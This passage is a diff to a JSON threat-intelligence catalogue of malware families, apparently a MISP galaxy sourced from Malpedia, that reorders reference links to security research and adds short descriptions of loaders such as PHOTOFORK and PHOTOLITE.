"https://marcoramilli.com/2021/08/23/paradise-ransomware-the-builder/", + "https://mssplab.github.io/threat-hunting/2023/06/23/src-paradise.html", "https://labs.bitdefender.com/2020/01/paradise-ransomware-decryption-tool", - "https://www.acronis.com/en-us/blog/posts/paradise-ransomware-strikes-again" + "https://asec.ahnlab.com/en/47590/" ], "synonyms": [], "type": [] @@ -37076,14 +38794,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.parallax", - "https://twitter.com/malwrhunterteam/status/1227196799997431809", - "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html", "https://blog.morphisec.com/parallax-rat-active-status", - "https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/", - "https://threatpost.com/ta2541-apt-rats-aviation/178422/", + "https://www.bleepingcomputer.com/news/security/parallax-rat-common-malware-payload-after-hacker-forums-promotion/", "https://www.vkremez.com/2020/02/lets-learn-inside-parallax-rat-malware.html", "https://www.uptycs.com/blog/cryptocurrency-entities-at-risk-threat-actor-uses-parallax-rat-for-infiltration", - "https://www.bleepingcomputer.com/news/security/parallax-rat-common-malware-payload-after-hacker-forums-promotion/" + "https://twitter.com/malwrhunterteam/status/1227196799997431809", + "https://threatpost.com/ta2541-apt-rats-aviation/178422/", + "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html", + "https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/" ], "synonyms": [ "ParallaxRAT" @@ -37111,34 +38829,34 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.partyticket", - "https://securelist.com/elections-goransom-and-hermeticwiper-attack/105960/", - "https://www.zscaler.com/blogs/security-research/technical-analysis-partyticket-ransomware", - "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/", - "https://www.youtube.com/watch?v=mrTdSdMMgnk", - "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine", - "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview", - "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/", - "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-hermeticwiper-partyticket", + "https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-hermeticransom-victims-in-ukraine/", "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/", - "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd", + "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview", + "https://securelist.com/new-ransomware-trends-in-2022/106457/", + "https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html", + "https://securelist.com/elections-goransom-and-hermeticwiper-attack/105960/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war", + "https://www.mandiant.com/resources/information-operations-surrounding-ukraine", + "https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/", + "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/", + "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/", + "https://go.recordedfuture.com/hubfs/reports/mtp-2022-0302.pdf", + "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf", + "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-hermeticwiper-partyticket", + "https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/", "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", "https://www.crowdstrike.com/blog/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine/", - "https://securelist.com/new-ransomware-trends-in-2022/106457/", - "https://decoded.avast.io/threatresearch/help-for-ukraine-free-decryptor-for-hermeticransom-ransomware/", - "https://www.brighttalk.com/webcast/15591/534324", - "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf", - "https://go.recordedfuture.com/hubfs/reports/mtp-2022-0302.pdf", - "https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war", - "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf", - "https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/", "https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", - "https://www.mandiant.com/resources/information-operations-surrounding-ukraine", - "https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-hermeticransom-victims-in-ukraine/", - "https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/", "https://www.techtarget.com/searchsecurity/news/252514091/CrowdStrike-cracks-PartyTicket-ransomware-targeting-Ukraine", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf" + "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine", + "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd", + "https://decoded.avast.io/threatresearch/help-for-ukraine-free-decryptor-for-hermeticransom-ransomware/", + "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", + "https://www.brighttalk.com/webcast/15591/534324", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf", + "https://www.zscaler.com/blogs/security-research/technical-analysis-partyticket-ransomware", + "https://www.youtube.com/watch?v=mrTdSdMMgnk" ], "synonyms": [ "Elections GoRansom", @@ -37168,13 +38886,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pay2key", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://research.checkpoint.com/2020/ransomware-alert-pay2key/", - "https://twitter.com/TrendMicroRSRCH/status/1389422784808378370", - "https://www.bleepingcomputer.com/news/security/intels-habana-labs-hacked-by-pay2key-ransomware-data-stolen/", + "https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf" + "https://www.bleepingcomputer.com/news/security/intels-habana-labs-hacked-by-pay2key-ransomware-data-stolen/", + "https://twitter.com/TrendMicroRSRCH/status/1389422784808378370", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3" ], "synonyms": [ "Cobalt" @@ -37202,8 +38920,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pcshare", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf", - "https://web.archive.org/web/20191115210757/https://threatvector.cylance.com/en_us/home/pcshare-backdoor-attacks-targeting-windows-users-with-fakenarrator-malware.html" + "https://web.archive.org/web/20191115210757/https://threatvector.cylance.com/en_us/home/pcshare-backdoor-attacks-targeting-windows-users-with-fakenarrator-malware.html", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf" ], "synonyms": [], "type": [] @@ -37216,14 +38934,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pebbledash", + "https://malwarenailed.blogspot.com/2020/06/peebledash-lazarus-hiddencobra-rat.html?m=1", + "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/", + "https://asec.ahnlab.com/en/30022/", "https://www.us-cert.gov/ncas/analysis-reports/ar20-133c", "https://blog.reversinglabs.com/blog/hidden-cobra", - "https://asec.ahnlab.com/en/30022/", - "https://download.ahnlab.com/global/brochure/Analysis%20Report%20of%20Kimsuky%20Group.pdf", - "https://asec.ahnlab.com/wp-content/uploads/2021/11/Kimsuky-%EA%B7%B8%EB%A3%B9%EC%9D%98-APT-%EA%B3%B5%EA%B2%A9-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C-AppleSeed-PebbleDash.pdf", "https://asec.ahnlab.com/en/30532/", - "https://malwarenailed.blogspot.com/2020/06/peebledash-lazarus-hiddencobra-rat.html?m=1", - "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/" + "https://asec.ahnlab.com/wp-content/uploads/2021/11/Kimsuky-%EA%B7%B8%EB%A3%B9%EC%9D%98-APT-%EA%B3%B5%EA%B2%A9-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C-AppleSeed-PebbleDash.pdf", + "https://download.ahnlab.com/global/brochure/Analysis%20Report%20of%20Kimsuky%20Group.pdf" ], "synonyms": [], "type": [] @@ -37236,10 +38954,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.peddlecheap", - "https://obscuritylabs.com/blog/2017/11/13/match-made-in-the-shadows-part-3/", - "https://twitter.com/ESETresearch/status/1258353960781598721", "https://www.forcepoint.com/fr/blog/security-labs/new-whitepaper-danderspritzpeddlecheap-traffic-analysis-part-1-2#", - "https://research.checkpoint.com/2021/a-deep-dive-into-doublefeature-equation-groups-post-exploitation-dashboard/" + "https://research.checkpoint.com/2021/a-deep-dive-into-doublefeature-equation-groups-post-exploitation-dashboard/", + "https://twitter.com/ESETresearch/status/1258353960781598721", + "https://obscuritylabs.com/blog/2017/11/13/match-made-in-the-shadows-part-3/" ], "synonyms": [], "type": [] @@ -37299,7 +39017,7 @@ "value": "Peppy RAT" }, { - "description": "", + "description": "The PetrWrap Trojan is written in C and compiled in MS Visual Studio. It carries a sample of the Petya ransomware v3 inside its data section and uses Petya to infect the victim\u2019s machine. What\u2019s more, PetrWrap implements its own cryptographic routines and modifies the code of Petya in runtime to control its execution. This allows the criminals behind PetrWrap to hide the fact that they are using Petya during infection.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.petrwrap", @@ -37317,15 +39035,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.petya", - "https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/", - "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", - "https://blog.malwarebytes.com/threat-analysis/2016/05/petya-and-mischa-ransomware-duet-p1/", - "https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/", "https://www.microsoft.com/security/blog/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/", - "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", + "https://securelist.com/petya-the-two-in-one-trojan/74609/", + "https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/", "https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/" + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", + "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html", + "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", + "https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/", + "https://blog.malwarebytes.com/threat-analysis/2016/05/petya-and-mischa-ransomware-duet-p1/" ], "synonyms": [], "type": [] @@ -37365,12 +39084,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.philadelphia_ransom", - "https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware", - "https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/", - "https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/", "https://intel471.com/blog/a-brief-history-of-ta505", "https://www.cylance.com/en_us/blog/threat-spotlight-philadelphia-ransomware.html", + "https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware", + "https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf" ], "synonyms": [], @@ -37384,29 +39103,32 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos", - "https://www.youtube.com/watch?v=LUxOcpIRxmg", - "https://www.fortinet.com/blog/threat-research/deep-analysis-the-eking-variant-of-phobos-ransomware", - "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", - "https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground", - "https://blogs.blackberry.com/en/2021/11/zebra2104", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", - "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/", - "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://blog.malwarebytes.com/threat-spotlight/2020/01/threat-spotlight-phobos-ransomware-lives-up-to-its-name/", - "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", - "https://blog.morphisec.com/the-fair-upgrade-variant-of-phobos-ransomware", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://paraflare.com/luci-spools-the-fun-with-phobos-ransomware/", - "https://blog.malwarebytes.com/threat-analysis/2019/07/a-deep-dive-into-phobos-ransomware/", "https://securelist.com/cis-ransomware/104452/", + "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", - "https://www.coveware.com/blog/phobos-ransomware-distributed-dharma-crew", - "https://www.sri.ro/articole/atac-cibernetic-cu-aplicatia-ransomware-phobos", + "https://twitter.com/rivitna2/status/1674718854549831681", + "https://blog.malwarebytes.com/threat-spotlight/2020/01/threat-spotlight-phobos-ransomware-lives-up-to-its-name/", + "https://paraflare.com/luci-spools-the-fun-with-phobos-ransomware/", + "https://blog.morphisec.com/the-fair-upgrade-variant-of-phobos-ransomware", "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/", - "https://cert.pl/en/posts/2023/02/breaking-phobos/" + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", + "https://blogs.blackberry.com/en/2021/11/zebra2104", + "https://blog.malwarebytes.com/threat-analysis/2019/07/a-deep-dive-into-phobos-ransomware/", + "https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground", + "https://www.coveware.com/blog/phobos-ransomware-distributed-dharma-crew", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.fortinet.com/blog/threat-research/deep-analysis-the-eking-variant-of-phobos-ransomware", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://cert.pl/en/posts/2023/02/breaking-phobos/", + "https://www.acronis.com/en-sg/cyber-protection-center/posts/8base-ransomware-stays-unseen-for-a-year/", + "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", + "https://www.sri.ro/articole/atac-cibernetic-cu-aplicatia-ransomware-phobos" ], "synonyms": [], "type": [] @@ -37419,10 +39141,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoenix_keylogger", - "https://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger", - "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", "https://threatresearch.ext.hp.com/the-many-skins-of-snake-keylogger/", - "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass" + "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass", + "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", + "https://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger" ], "synonyms": [], "type": [] @@ -37437,8 +39159,8 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoenix_locker", "https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf", "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", - "https://killingthebear.jorgetesta.tech/actors/evil-corp", "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp", + "https://killingthebear.jorgetesta.tech/actors/evil-corp", "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself" ], "synonyms": [], @@ -37465,9 +39187,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoreal", + "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf", "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", - "https://elastic.github.io/security-research/intelligence/2022/03/02.phoreal-targets-southeast-asia-financial-sector/article/", - "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf" + "https://elastic.github.io/security-research/intelligence/2022/03/02.phoreal-targets-southeast-asia-financial-sector/article/" ], "synonyms": [ "Rizzo" @@ -37482,66 +39204,104 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex", - "https://twitter.com/_CPResearch_/status/1447852018794643457", - "https://research.checkpoint.com/2019/phorpiex-breakdown/", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", - "https://bin.re/blog/phorpiex/", - "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/", - "https://therecord.media/phorpiex-botnet-shuts-down-source-code-goes-up-for-sale/", "https://blogs.vmware.com/security/2021/11/telemetry-peak-analyzer-an-automatic-malware-campaign-detector.html", - "https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet", - "https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/", - "https://www.johannesbader.ch/2016/02/phorpiex/", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - "https://research.checkpoint.com/2021/phorpiex-botnet-is-back-with-a-new-twizt-hijacking-hundreds-of-crypto-transactions/", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/", - "https://www.zdnet.com/article/someone-is-uninstalling-the-phorpiex-malware-from-infected-pcs-and-telling-users-to-install-an-antivirus/", "https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/", - "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows" + "https://research.checkpoint.com/2019/phorpiex-breakdown/", + "https://research.checkpoint.com/2021/phorpiex-botnet-is-back-with-a-new-twizt-hijacking-hundreds-of-crypto-transactions/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet", + "https://therecord.media/phorpiex-botnet-shuts-down-source-code-goes-up-for-sale/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/", + "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://www.zdnet.com/article/someone-is-uninstalling-the-phorpiex-malware-from-infected-pcs-and-telling-users-to-install-an-antivirus/", + "https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/", + "https://twitter.com/_CPResearch_/status/1447852018794643457", + "https://www.johannesbader.ch/2016/02/phorpiex/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://bin.re/blog/phorpiex/", + "https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/" ], "synonyms": [ - "Trik" + "Trik", + "phorphiex" ], "type": [] }, "uuid": "9759f99b-6d6c-4633-aa70-cb1d2bacc540", "value": "Phorpiex" }, + { + "description": "PHOTOFORK is a downloader which is a modified version of GZIPLOADER. It was first detected in February 2023 and was distributed by TA581 along with an unattributed threat activity cluster that facilitated initial access. In this version, the configuration file is no longer encrypted using a simple XOR algorithm with a 64-byte key. Instead, it uses a custom algorithm previously used by the Standard core loader. This algorithm decrypts DLL strings that are needed to resolve handles to the necessary DLLs later on. The strings are decrypted using an algorithm that splits the data into DWORDs and XORs it against a random key. The main objective of PHOTOFORK remains the same as GZIPLOADER, i.e. to deliver an encrypted bot and core DLL loader (forked) that loads the Forked ICEDID bot into memory using a custom PE format.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.photofork", + "https://www.proofpoint.com/us/blog/threat-insight/fork-ice-new-era-icedid" + ], + "synonyms": [], + "type": [] + }, + "uuid": "10d3dd4b-8858-4131-bcf0-60982f36e43d", + "value": "PHOTOFORK" + }, + { + "description": "PHOTOLITE is the lite version of the GZIPLOADER with limited capabilities i.e. for example it does not have any functionality to exfiltrate the host information. This new variant is observed as a follow-on payload in a TA542 Emotet campaign back in November'22. contains a static URL to download a \"Bot Pack\" file with a static name (botpack.dat) which results in the IcedID Lite DLL Loader, and then delivers the Forked version of IcedID Bot, leaving out the webinjects and backconnect functionality that would typically be used for banking fraud. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.photolite", + "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return", + "https://www.proofpoint.com/us/blog/threat-insight/fork-ice-new-era-icedid", + "https://www.intrinsec.com/emotet-returns-and-deploys-loaders/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e4609860-99f9-47c9-9e36-350611466f3c", + "value": "PHOTOLITE" + }, { "description": "A loader used to deliver IcedID, fetching a fake image from which payloads are extracted.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.photoloader", - "https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/", - "https://isc.sans.edu/diary/29740", - "https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary", - "https://www.team-cymru.com/post/from-chile-with-malware", - "https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/", - "https://blog.unpac.me/2023/05/03/unpacme-weekly-new-version-of-icedid-loader", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://research.openanalysis.net/icedid/bokbot/photoloader/config/2023/04/06/photoloader.html", - "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", - "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns", - "https://twitter.com/felixw3000/status/1521816045769662468", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", - "https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload/", - "https://blog.talosintelligence.com/following-the-lnk-metadata-trail", - "https://www.youtube.com/watch?v=4j8t9kFLFIY", - "https://isc.sans.edu/diary/28636", - "https://www.elastic.co/security-labs/unpacking-icedid", - "https://www.silentpush.com/blog/malicious-infrastructure-as-a-service", - "https://unit42.paloaltonetworks.com/teasing-secrets-malware-configuration-parsing", - "https://www.spreaker.com/user/16860719/proofpoint-e29-mix-v1", "https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes", + "https://twitter.com/felixw3000/status/1521816045769662468", + "https://www.elastic.co/security-labs/unpacking-icedid", + "https://blog.talosintelligence.com/following-the-lnk-metadata-trail", + "https://leandrofroes.github.io/posts/Reversing-a-recent-IcedID-Crypter/", + "https://isc.sans.edu/diary/29740", + "https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/", + "https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload/", + "https://www.silentpush.com/blog/malicious-infrastructure-as-a-service", + "https://www.silentpush.com/blog/icedid-command-and-control-infrastructure", "https://www.team-cymru.com/post/a-visualizza-into-recent-icedid-campaigns", + "https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/", "https://sysopfb.github.io/malware,/icedid/2020/04/28/IcedIDs-updated-photoloader.html", + "https://blog.unpac.me/2023/05/03/unpacme-weekly-new-version-of-icedid-loader", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://www.silentpush.com/blog/icedid-command-and-control-infrastructure" + "https://www.proofpoint.com/us/blog/threat-insight/fork-ice-new-era-icedid", + "https://unit42.paloaltonetworks.com/teasing-secrets-malware-configuration-parsing", + "https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary", + "https://www.youtube.com/watch?v=4j8t9kFLFIY", + "https://www.team-cymru.com/post/from-chile-with-malware", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://www.deepinstinct.com/blog/pindos-new-javascript-dropper-delivering-bumblebee-and-icedid", + "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns", + "https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/", + "https://isc.sans.edu/diary/28636", + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", + "https://www.spreaker.com/user/16860719/proofpoint-e29-mix-v1", + "https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/", + "https://www.first.org/resources/papers/amsterdam23/IcedID-FIRST-AMS-2023.pdf", + "https://unit42.paloaltonetworks.com/wireshark-quiz-icedid-answers/", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", + "https://research.openanalysis.net/icedid/bokbot/photoloader/config/2023/04/06/photoloader.html" + ], + "synonyms": [ + "GZIPLOADER" ], - "synonyms": [], "type": [] }, "uuid": "3418ca80-73d9-49ab-836a-98230a83c67d", @@ -37552,8 +39312,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pickpocket", - 